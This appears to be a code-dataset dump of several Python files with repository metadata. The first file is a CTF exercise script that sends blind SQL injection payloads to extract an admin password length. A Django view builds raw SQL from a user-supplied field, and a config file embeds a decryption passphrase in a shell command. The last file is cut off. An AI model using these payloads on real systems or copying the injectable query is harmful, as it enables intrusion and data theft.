hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | 
qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
c4c0c23efe0af691e686cdc320886e050cb8e361 | 636 | py | Python | 0x05/solve/ex1-0x05.py | tuannm-1876/sec-exercises | d8ea08bc02003af3722e0553060ed370ed395b33 | [
"MIT"
] | null | null | null | 0x05/solve/ex1-0x05.py | tuannm-1876/sec-exercises | d8ea08bc02003af3722e0553060ed370ed395b33 | [
"MIT"
] | null | null | null | 0x05/solve/ex1-0x05.py | tuannm-1876/sec-exercises | d8ea08bc02003af3722e0553060ed370ed395b33 | [
"MIT"
] | null | null | null | import urllib
import urllib2
url = "http://ctfq.sweetduet.info:10080/~q6/"
def main():
    for i in range(1, 100):
        data = {
            "id": "admin' AND (SELECT LENGTH(pass) FROM user WHERE id = 'admin') = {counter} --".format(counter=i),
            "pass": "",
        }
        print (data)
        data1 = urllib.urlencode(data).encode("utf-8")
        req = urllib2.Request(url, data1)
        res = urllib2.urlopen(req)
        print (res)
        if int(res.headers["content-length"]) > 2000:
            print("Do dai cua password: {counter}".format(counter=i))
            break
if __name__ == "__main__":
main() | 30.285714 | 115 | 0.550314 | 77 | 636 | 4.441558 | 0.662338 | 0.040936 | 0.116959 | 0.122807 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.044248 | 0.289308 | 636 | 21 | 116 | 30.285714 | 0.712389 | 0 | 0 | 0 | 0 | 0.052632 | 0.276295 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0.157895 | 0.105263 | 0 | 0.157895 | 0.157895 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
c4c4d67f988add89a513610e9e3367a81daf5283 | 593 | py | Python | code_examples/package_example/my_scripts/network/connect_telnet.py | natenka/natenka.github.io | 74c56be74f2c9b15a4c9b523a1622453ae2064af | [
"MIT"
] | 18 | 2017-02-19T15:58:54.000Z | 2022-02-13T22:15:19.000Z | code_examples/package_example/my_scripts/network/connect_telnet.py | natenka/natenka.github.io | 74c56be74f2c9b15a4c9b523a1622453ae2064af | [
"MIT"
] | 1 | 2020-02-24T23:14:15.000Z | 2020-02-24T23:14:15.000Z | code_examples/package_example/my_scripts/network/connect_telnet.py | natenka/natenka.github.io | 74c56be74f2c9b15a4c9b523a1622453ae2064af | [
"MIT"
] | 27 | 2017-05-03T15:38:41.000Z | 2022-02-08T02:53:38.000Z | import telnetlib
import time
def send_command_telnetlib(ipaddress, username, password, enable_pass, command):
    t = telnetlib.Telnet("192.168.100.1")
    t.read_until(b"Username:")
    t.write(username.encode("ascii") + b"\n")
    t.read_until(b"Password:")
    t.write(password.encode("ascii") + b"\n")
    t.write(b"enable\n")
    t.read_until(b"Password:")
    t.write(enable_pass.encode("ascii") + b"\n")
    t.read_until(b"#")
    t.write(b"terminal length 0\n")
    t.write(command + b"\n")
    time.sleep(1)
    result = t.read_until(b"#").decode("utf-8")
    return result
| 21.178571 | 80 | 0.63575 | 92 | 593 | 4 | 0.358696 | 0.097826 | 0.13587 | 0.149457 | 0.277174 | 0.23913 | 0.23913 | 0.23913 | 0 | 0 | 0 | 0.026639 | 0.177066 | 593 | 27 | 81 | 21.962963 | 0.727459 | 0 | 0 | 0.117647 | 0 | 0 | 0.164129 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0.294118 | 0.117647 | 0 | 0.235294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
c4c5720115308ec3559711c2319791d1086d71cd | 837 | py | Python | fullstack/migrations/0004_officeholder.py | TylerFisher/full-stack-react | dae5df2b85944e66a9ad0c64cad3e83b7cb1e173 | [
"MIT"
] | 9 | 2019-01-26T20:09:24.000Z | 2021-02-28T12:09:17.000Z | fullstack/migrations/0004_officeholder.py | dariyamizzou/full-stack-react | dae5df2b85944e66a9ad0c64cad3e83b7cb1e173 | [
"MIT"
] | 3 | 2020-02-11T23:49:18.000Z | 2021-06-10T21:13:36.000Z | fullstack/migrations/0004_officeholder.py | dariyamizzou/full-stack-react | dae5df2b85944e66a9ad0c64cad3e83b7cb1e173 | [
"MIT"
] | 1 | 2019-03-09T18:33:12.000Z | 2019-03-09T18:33:12.000Z | # Generated by Django 2.1.5 on 2019-01-27 22:45
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
    dependencies = [
        ('fullstack', '0003_auto_20190127_2223'),
    ]
    operations = [
        migrations.CreateModel(
            name='Officeholder',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('term_start', models.DateField()),
                ('term_end', models.DateField()),
                ('office', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='fullstack.Office')),
                ('person', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='fullstack.Person')),
            ],
        ),
    ]
| 32.192308 | 114 | 0.612903 | 88 | 837 | 5.738636 | 0.590909 | 0.063366 | 0.083168 | 0.130693 | 0.253465 | 0.253465 | 0.253465 | 0.253465 | 0.253465 | 0.253465 | 0 | 0.051037 | 0.250896 | 837 | 25 | 115 | 33.48 | 0.754386 | 0.053763 | 0 | 0 | 1 | 0 | 0.136709 | 0.029114 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.157895 | 0 | 0.315789 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c4c7aa58a5a7074c7dc6f26bfd9244c8183f237e | 7,909 | py | Python | pages/views.py | SmartDataWithR/CovidHelper | 21f8c3f3d81da0b5ec32b228c711e96f9d5c168e | [
"MIT"
] | null | null | null | pages/views.py | SmartDataWithR/CovidHelper | 21f8c3f3d81da0b5ec32b228c711e96f9d5c168e | [
"MIT"
] | 9 | 2020-03-27T10:33:35.000Z | 2022-03-12T00:20:47.000Z | pages/views.py | SmartDataWithR/CovidHelper | 21f8c3f3d81da0b5ec32b228c711e96f9d5c168e | [
"MIT"
] | null | null | null | from django.views.generic import TemplateView
from ipware import get_client_ip
from django.shortcuts import render, redirect
from django.contrib import messages
from django.contrib.auth.forms import PasswordChangeForm
from django.contrib.auth import update_session_auth_hash
from django.conf import settings
from .forms import SearchForm
from users.models import CustomUser
import geopy
from geopy.distance import geodesic
import pandas as pd
import json
from django.utils.translation import gettext as _, activate
# required for IP to numeric
import socket
import struct
# import file for ip's to language mapping
df_ip_lang = pd.read_csv('pages/lng_map.csv', names=['ip_from', 'ip_to', 'country_code', 'country_name', 'lang_code'] )
def ip(request):
ip, is_routable = get_client_ip(request)
if ip is None:
ip = "0.0.0.0"
else:
if is_routable:
ipv = "Public"
else:
ipv = "Private"
return (ip, ipv)
def ip2int(addr):
return struct.unpack("!I", socket.inet_aton(addr))[0]
def index(request):
search = request.POST.get('search-field')
searchCat = request.POST.get('search-catogery')
locator = geopy.Nominatim(user_agent="myGeocoder")
gotodiv = False
# From IP to Language
#--------------------
request_ip = ip(request) # get request IP
request_ip_int = ip2int(request_ip[0]) # convert IP to numeric
df_filt = df_ip_lang[df_ip_lang.ip_from <= request_ip_int] # filter data for fetched ip
range_to_check = df_filt.iloc[-1]
is_in_range = request_ip_int > range_to_check.ip_from & request_ip_int < range_to_check.ip_to # check that my IP is in range
country_code = 'en-us' # initialise default language
if is_in_range: # if an entry is found in dataframe, set this one to country-code
country_code = range_to_check.lang_code
activate(country_code) # activate the current language code
current_path = str(request.get_full_path()).strip('/')
print(current_path)
# if user selected a language manually, use this one
if current_path == 'en':
activate('en-us')
elif current_path != '':
activate(current_path)
context = {}
if search != None:
location = locator.geocode(search, timeout=5)
if not hasattr(location, 'longitude'):
location = locator.geocode('Hamburg', timeout=5)
# get result for 'All' (Category 4)
if searchCat == '4':
sql_q = 'SELECT * FROM users_customuser'
else:
sql_q = 'SELECT * FROM users_customuser WHERE group_membership like ' + searchCat
print(sql_q)
#query = 'SELECT * FROM users_customuser'
#if search != None and searchCat == '4':
#df = pd.DataFrame([u.id, u.group_membership, u.longitude, u.latitude, u.slogan, u.zip_code, u.description, u.map_show_location, u.username, u.help_type] for u in CustomUser.objects.raw('SELECT * FROM users_customuser') )
#query = 'SELECT * FROM users_customuser'
#else:
#df = pd.DataFrame([u.id, u.group_membership, u.longitude, u.latitude, u.slogan, u.zip_code, u.description, u.map_show_location, u.username, u.help_type] for u in CustomUser.objects.raw('SELECT * FROM users_customuser WHERE group_membership = searchCat') )
#query = 'SELECT * FROM users_customuser WHERE group_membership = '.searchCat
# df = pd.DataFrame([u.id, u.group_membership, u.longitude, u.latitude, u.slogan, u.zip_code, u.description, u.map_show_location, u.username, u.help_type, u.userImg_Url] for u in CustomUser.objects.raw('SELECT * FROM users_customuser WHERE group_membership IN(SELECT group_membership FROM users_customuser WHERE (%s<>'' AND group_membership IN('0','1','3')) OR (%s<>'' AND group_membership=group_membership))', [searchCat]) )
#df = pd.DataFrame([u.id, u.group_membership, u.longitude, u.latitude, u.slogan, u.zip_code, u.description, u.map_show_location, u.username, u.help_type, u.userImg_Url] for u in CustomUser.objects.raw('SELECT * FROM users_customuser WHERE group_membership IN(SELECT group_membership FROM users_customuser WHERE (%s <> NULL AND group_membership IN('0','1','3')) OR (group_membership = group_membership))', [searchCat]) )
df = pd.DataFrame([u.id, u.group_membership, u.longitude, u.latitude, u.slogan, u.zip_code, u.description, u.map_show_location, u.username, u.help_type, u.userImg_Url, u.shop_type] for u in CustomUser.objects.raw(sql_q) )
df.columns = ['id','group_membership', 'longitude', 'latitude', 'slogan', 'zip_code', 'description', 'map_show_location', 'username', 'help_type', 'userImg_Url', 'shop_type']
df['distance'] = [geodesic((location.longitude, location.latitude), (x, y)).miles for x,y in zip(df['longitude'], df['latitude'])]
# filter for distance max 20km (12.4miles)
df_filt = df[df['distance'] < 12.4]
print(df_filt)
# pass the data to the template
group_membership = df_filt['group_membership'].values.tolist()
group_membership = [int(x) for x in group_membership]
help_type = df_filt['help_type'].values.tolist()
userImg_Url = df_filt['userImg_Url'].values.tolist()
slogan = df_filt['slogan'].values.tolist()
shop_type = df_filt['shop_type'].values.tolist()
description = df_filt['description'].values.tolist()
username = df_filt['username'].values.tolist()
zipcode = df_filt['zip_code'].values.tolist()
#tel_private = df_filt['tel_private'].values.tolist()
#tel_mobile = df_filt['tel_mobile'].values.tolist()
longitudes = df_filt['longitude'].values.tolist()
latitudes = df_filt['latitude'].values.tolist()
ids = df_filt['id'].values.tolist()
map_show_location = df_filt['map_show_location'].values.tolist()
map_show_location = [int(x) for x in map_show_location]
rname = list(range(0, len(ids)))
template_table = list(zip(rname, ids, slogan, description, zipcode))
gotodiv = 'search'
context = {'longitude': location.longitude, 'latitude': location.latitude,'id':ids, 'userImg_Url':userImg_Url, 'group_membership': group_membership, 'longitudes': longitudes, 'latitudes': latitudes, 'slogan': slogan, 'description': description, 'gotodiv': gotodiv, 'map_show_location':map_show_location, 'template_table':template_table, 'username':username, 'help_type':help_type}
return render(request, 'pages/home.html', context)
class HomePageView(TemplateView):
template_name = 'pages/home.html'
class AboutPageView(TemplateView):
template_name = 'pages/about.html'
def searchLocation(request):
form = SearchForm(request)
print(form)
if request.method=='POST':
form = SearchForm(request.POST)
return render(request, 'pages/home.html', {'form': form})
def change_password(request):
if request.method == 'POST':
form = PasswordChangeForm(request.user, request.POST)
if form.is_valid():
user = form.save()
update_session_auth_hash(request, user) # Important!
messages.success(request, 'Your password was successfully updated!')
return redirect('change_password')
else:
messages.error(request, 'Please correct the error below.')
else:
form = PasswordChangeForm(request.user)
return render(request, 'account/password_set.html', {
'form': form
})
def privacy(request):
return render(request, 'pages/privacy.html')
def imprint(request):
return render(request, 'pages/imprint.html')
def terms(request):
return render(request, 'pages/terms_conditions.html')
def cookie_policy(request):
return render(request, 'pages/cookie_policy.html')
| 48.820988 | 449 | 0.677709 | 1,050 | 7,909 | 4.922857 | 0.207619 | 0.072548 | 0.034823 | 0.043529 | 0.330238 | 0.264655 | 0.245889 | 0.221319 | 0.204101 | 0.204101 | 0 | 0.004578 | 0.19914 | 7,909 | 161 | 450 | 49.124224 | 0.811494 | 0.268808 | 0 | 0.060345 | 0 | 0 | 0.159513 | 0.013206 | 0 | 0 | 0 | 0 | 0 | 1 | 0.077586 | false | 0.060345 | 0.137931 | 0.043103 | 0.336207 | 0.051724 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
c4cd1bca866664aa443fc8b603dcfac8e9e9cf00 | 353 | py | Python | src/118. Pascal's Triangle.py | rajshrivastava/LeetCode | dfe6342fe22b324429b0be3e5c0fef46c7e6b3b0 | [
"MIT"
] | 1 | 2019-12-16T08:18:25.000Z | 2019-12-16T08:18:25.000Z | src/118. Pascal's Triangle.py | rajshrivastava/LeetCode | dfe6342fe22b324429b0be3e5c0fef46c7e6b3b0 | [
"MIT"
] | null | null | null | src/118. Pascal's Triangle.py | rajshrivastava/LeetCode | dfe6342fe22b324429b0be3e5c0fef46c7e6b3b0 | [
"MIT"
] | null | null | null | class Solution:
    def generate(self, numRows: int) -> List[List[int]]:
        result = [[1]]
        for i in range(1, numRows):
            temp = [1]
            for j in range(1, i):
                temp.append(result[-1][j-1] + result[-1][j])
            temp.append(1)
            result.append(temp)
        return result
| 27.153846 | 60 | 0.450425 | 43 | 353 | 3.697674 | 0.418605 | 0.132075 | 0.100629 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.038462 | 0.410765 | 353 | 12 | 61 | 29.416667 | 0.725962 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0 | 0 | 0.3 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c4d236eae71088db952059a4c21b0e805b6bad1c | 2,228 | py | Python | components/icdc-sheepdog/sheepdog/utils/parse.py | CBIIT/icdc-docker | 5dc78b96a8d885b3fa427c55b9cc19f4771910fa | [
"Apache-2.0"
] | 2 | 2019-06-10T15:30:51.000Z | 2020-01-18T23:24:13.000Z | components/icdc-sheepdog/sheepdog/utils/parse.py | CBIIT/icdc-docker | 5dc78b96a8d885b3fa427c55b9cc19f4771910fa | [
"Apache-2.0"
] | null | null | null | components/icdc-sheepdog/sheepdog/utils/parse.py | CBIIT/icdc-docker | 5dc78b96a8d885b3fa427c55b9cc19f4771910fa | [
"Apache-2.0"
] | 1 | 2022-03-31T09:52:46.000Z | 2022-03-31T09:52:46.000Z | """
TODO
"""
from collections import Counter
import simplejson
import yaml
import flask
from sheepdog.errors import (
    UserError,
)
def oph_raise_for_duplicates(object_pairs):
    """
    Given an list of ordered pairs, contstruct a dict as with the normal JSON
    ``object_pairs_hook``, but raise an exception if there are duplicate keys
    with a message describing all violations.
    """
    counter = Counter(p[0] for p in object_pairs)
    duplicates = [p for p in counter.iteritems() if p[1] > 1]
    if duplicates:
        raise ValueError(
            'The document contains duplicate keys: {}'
            .format(','.join(d[0] for d in duplicates))
        )
    return {pair[0]: pair[1] for pair in object_pairs}
def parse_json(raw):
    """
    Return a python representation of a JSON document.
    Args:
        raw (str): string of raw JSON content
    Raises:
        UserError: if any exception is raised parsing the JSON body
    .. note:: Uses :func:`oph_raise_for_duplicates` in parser.
    """
    try:
        return simplejson.loads(
            raw, object_pairs_hook=oph_raise_for_duplicates
        )
    except Exception as e:
        raise UserError('Unable to parse json: {}'.format(e))
def parse_request_json(expected_types=(dict, list)):
    """
    Return a python representation of a JSON POST body.
    Args:
        raw (str): string of raw JSON content
    Return:
        TODO
    Raises:
        UserError: if any exception is raised parsing the JSON body
        UserError: if the result is not of the expected type
    If raw is not provided, pull the body from global request object.
    """
    parsed = parse_json(flask.request.get_data())
    if not isinstance(parsed, expected_types):
        raise UserError('JSON parsed from request is an invalid type: {}'
                        .format(parsed.__class__.__name__))
    return parsed
def parse_request_yaml():
    """
    Return a python representation of a YAML POST body. Raise UserError if any
    exception is raised parsing the YAML body.
    """
    try:
        return yaml.safe_load(flask.request.get_data())
    except Exception as e:
        raise UserError('Unable to parse yaml: {}'.format(e))
| 26.52381 | 78 | 0.653501 | 300 | 2,228 | 4.736667 | 0.33 | 0.038705 | 0.023223 | 0.044335 | 0.283603 | 0.283603 | 0.262491 | 0.214638 | 0.140746 | 0.07741 | 0 | 0.003656 | 0.263465 | 2,228 | 83 | 79 | 26.843373 | 0.862279 | 0.386445 | 0 | 0.117647 | 0 | 0 | 0.110121 | 0 | 0 | 0 | 0 | 0.024096 | 0 | 1 | 0.117647 | false | 0 | 0.147059 | 0 | 0.382353 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c4d694c5a7929d60a82f4266c36fe92a6487d6e2 | 910 | py | Python | example/models.py | nim65s/django-jugemaj | 771fb5ddb7ceaa3f6b8aa4178c95ab249a8ed406 | [
"BSD-2-Clause"
] | null | null | null | example/models.py | nim65s/django-jugemaj | 771fb5ddb7ceaa3f6b8aa4178c95ab249a8ed406 | [
"BSD-2-Clause"
] | 15 | 2017-06-08T08:12:36.000Z | 2022-03-21T20:03:02.000Z | example/models.py | nim65s/django-jugemaj | 771fb5ddb7ceaa3f6b8aa4178c95ab249a8ed406 | [
"BSD-2-Clause"
] | null | null | null | """Django models for the example app."""
from django.db import models
from wikidata.client import Client # type: ignore
LANGS = ["fr", "en"] # ordered list of langages to check on wikidata
class WikiDataModel(models.Model):
"""A django model to represent something available on wikidata."""
name = models.CharField(max_length=50)
wikidata = models.PositiveIntegerField()
def __str__(self):
"""Get the name of this wikidata instance."""
return self.name
@property
def wikidata_url(self):
"""Get a direct link to the wikidata item."""
return f"https://www.wikidata.org/wiki/Q{self.wikidata}"
def update_name(self):
"""Update the name from wikidata."""
labels = Client().get(f"Q{self.wikidata}", load=True).data["labels"]
self.name = next(labels[lang] for lang in LANGS if lang in labels)["value"]
self.save()
| 30.333333 | 83 | 0.657143 | 123 | 910 | 4.804878 | 0.528455 | 0.040609 | 0.043993 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002805 | 0.216484 | 910 | 29 | 84 | 31.37931 | 0.826087 | 0.292308 | 0 | 0 | 0 | 0 | 0.124797 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.133333 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
c4e5fbaf6cd5fcd29917077a2405f0c945660808 | 992 | py | Python | minimalist_cms/cms_content/migrations/0004_auto_20190719_1242.py | wullerot/django-minimalist-cms | bd6795d9647f9db1d98e83398238c0e63aca3c1b | [
"MIT"
] | null | null | null | minimalist_cms/cms_content/migrations/0004_auto_20190719_1242.py | wullerot/django-minimalist-cms | bd6795d9647f9db1d98e83398238c0e63aca3c1b | [
"MIT"
] | null | null | null | minimalist_cms/cms_content/migrations/0004_auto_20190719_1242.py | wullerot/django-minimalist-cms | bd6795d9647f9db1d98e83398238c0e63aca3c1b | [
"MIT"
] | null | null | null | # Generated by Django 2.1.10 on 2019-07-19 12:42
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    dependencies = [
        ('contenttypes', '0002_remove_content_type_name'),
        ('cms_content', '0003_auto_20190719_1232'),
    ]
    operations = [
        migrations.AlterModelOptions(
            name='element',
            options={'ordering': ['position'], 'verbose_name': 'Element', 'verbose_name_plural': 'Element'},
        ),
        migrations.AddField(
            model_name='container',
            name='content_type',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='contenttypes.ContentType', verbose_name='Content type'),
        ),
        migrations.AddField(
            model_name='container',
            name='object_id',
            field=models.PositiveIntegerField(blank=True, null=True, verbose_name='Object ID'),
        ),
    ]
| 33.066667 | 164 | 0.633065 | 103 | 992 | 5.92233 | 0.533981 | 0.072131 | 0.045902 | 0.072131 | 0.131148 | 0.131148 | 0 | 0 | 0 | 0 | 0 | 0.047682 | 0.238911 | 992 | 29 | 165 | 34.206897 | 0.760265 | 0.046371 | 0 | 0.304348 | 1 | 0 | 0.240466 | 0.080508 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.086957 | 0 | 0.217391 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c4e7ad2ce4410048f7e3d9df95d8ae13cd8fa8fc | 3,174 | py | Python | original-paas/copy_to_container/www/spdpaas/src/celeryApp/celeryConfig.py | yishan1331/docker-practice | 91a1a434cbffc33790678af5e09de310386812d1 | [
"MIT"
] | null | null | null | original-paas/copy_to_container/www/spdpaas/src/celeryApp/celeryConfig.py | yishan1331/docker-practice | 91a1a434cbffc33790678af5e09de310386812d1 | [
"MIT"
] | null | null | null | original-paas/copy_to_container/www/spdpaas/src/celeryApp/celeryConfig.py | yishan1331/docker-practice | 91a1a434cbffc33790678af5e09de310386812d1 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
==============================================================================
created : 02/08/2021
Last update: 02/08/2021
Developer: Yishan Tsai
Lite Version 1 @Yishan08032019
Filename: celeryconfig.py
Description: about celery configuration
==============================================================================
"""
from kombu import Queue
class BaseConfig(object):
    CELERY_ACCEPT_CONTENT= ['json']
    CELERY_TASK_SERIALIZER= 'json'
    CELERY_RESULT_SERIALIZER= 'json'
    CELERY_ENABLE_UTC=True
    CELERY_TIMEZONE='Asia/Taipei'
    # CELERY_ACKS_LATE=True, #https://kknews.cc/zh-tw/code/5v5vj52.html
    CELERYD_PREFETCH_MULTIPLIER=1
    CELERYD_MAX_TASKS_PER_CHILD=50 #memory leak
    CELERY_IGNORE_RESULT=True
    CELERY_STORE_ERRORS_EVEN_IF_IGNORED=True
    CELERY_TASK_CREATE_MISSING_QUEUES=False
    CELERY_QUEUES = {
        # Queue("default", routing_key = "default"),
        # Queue("queue1", routing_key = "high", queue_arguments={'maxPriority': 10}), #https://github.com/squaremo/amqp.node/issues/165
        Queue("H-queue1", routing_key = "high"),
        Queue("L-queue1", routing_key = "low")
    }
    CELERY_TASK_ROUTES = {
        'celeryApp.celeryTasks.celery_trigger_specific_program': {'queue': 'H-queue1','routing_key':'high'},
        'celeryApp.celeryTasks.celery_post_api_count_record': {'queue': 'L-queue1','routing_key':'low'},
        'celeryApp.celeryTasks.celery_send_email': {'queue': 'L-queue1','routing_key':'low'},
    }
def readConfig():
    import os, time
    import ConfigParser
    from app.globalvar import CONFIG as _CONFIG
    try:
        get_request_start_time = int(round(time.time()* 1000000))
        if not os.path.isfile('/var/www/spdpaas/config/deconstants_{}.conf'.format(str(get_request_start_time))):
            with os.popen('/usr/bin/openssl enc -aes-128-cbc -d -in /var/www/spdpaas/config/encconstants.conf -out /var/www/spdpaas/config/deconstants_{}.conf -pass pass:sapidotest2019'.format(str(get_request_start_time))) as osdecrypt:
                osdecrypt.read()
        CONFPATH = "/var/www/spdpaas/config/deconstants_{}.conf".format(str(get_request_start_time))
        CONFIG = ConfigParser.ConfigParser()
        CONFIG.read(CONFPATH)
